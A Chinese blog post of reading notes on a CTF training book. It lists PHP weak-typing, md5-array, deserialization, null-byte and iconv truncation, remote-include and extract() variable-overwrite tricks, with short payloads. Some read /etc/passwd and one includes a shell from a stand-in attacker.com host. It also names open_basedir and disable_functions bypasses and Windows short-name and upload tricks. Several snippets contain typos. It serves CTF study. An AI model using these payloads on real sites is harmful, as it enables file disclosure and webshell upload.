《CTF特训营》web部分读书笔记（四）利用特性攻击（php和win系统）

前言

继续阅读《CTF特训营》web部分
本节是利用特性攻击

1、PHP语言特性

弱类型

比较相等可以用==和===
前者会自动进行类型转换，存在漏洞

一些相等的值

"==0==false
'123'==123
'abc'==0
'123a'==123
'0x01'==1
'0e123456789'=='0e987654321'
[false]==[0]==[NULL]==["]
NULL==false==0
true==1

一个例子

if(&_GET['a']!=&_GET['b'] && md5(&_GET['a'])===md5(&_GET['b'])){
	echo $flag;
}

可以用a[]=1&b[]=2绕过
当md5函数的参数是数组时，函数会返回NULL
两个都返回NULL就成功绕过了

反序列化

PHP的serialize和unserialize函数
配合特殊的类magic函数：__construct、_destruct、__toString、__sleep、__wakeup

例子

&lists = []
Class filelist{
	public function __toString()
	{
		return highlight_file('hiehiehie.txt',true).highlight_file($thie->source,true);
	}
}
//...
?>

将source的变量设置为想要读取的文件名
再序列化即可

&lists = []
Class filelist{
	public function __toString()
	{
		return highlight_file('hiehiehie.txt',true).highlight_file($thie->source,true);
	}
}
&f=new filelist();
$f->source="/etc/passwd";
print_r(serialize(&f)):

参考：phithon对joomla漏洞的分析

截断

PHP内核是C语言
在遇到NULL(/x00)字符时会当作结束标记

例子

	&file = &_GET['file'];
	include $file.'.tpl.html';

绕过办法

?file=../../../etc/passwd%00
?file=../../../{*N}/etc/passwd

不过这个漏洞随着php更新消失了

另一个漏洞是iconv函数

例子

	$file=$_GET['file'].'.tpl.html';
	include(iconv("UTF-8","gb2312",$file));

当file中包含非法utf-8字符时，iconv函数会截断字符串
提交?file=shell.jpg%ff即可绕过
因为单个\x80-\xff都是非法的
同样的，这个漏洞也随着php更新消失了

伪协议

在php.ini的设置中若allow_url_include=1
即允许远程包含

可以输入

?file=http://attacker.com/shell.jpg

上传shell

类似的还有zip协议和phar协议

变量覆盖

函数使用不当

例子

	$auth=false;
	extract($_GET);
	if($auth){
		echo "flag{}";
	}else{
		echo "Access Denied";
	}
?>

extract函数将GET传入的数据转换为变量名和变量值

payload

?auth=1

防护绕过

open_basedir函数

• 防御PHP跨目录进行文件读写
• 通过DirectoryIterator+Glob绕过

disable_function函数

• 禁用危险函数：system、exec、shell_exec、passthru
• 依赖系统漏洞，如LD_PRELOAD来绕过

2、windows系统特性

短文件名

可以用短文件爆破和下载长文件
一些工具可参考lijiejie的IIS短文件名扫描工具

文件上传

通过\x80-\xff来绕过黑名单

结语

主要是php的特性
根据之前做题的经验
php5.5之前有很多漏洞
需要熟悉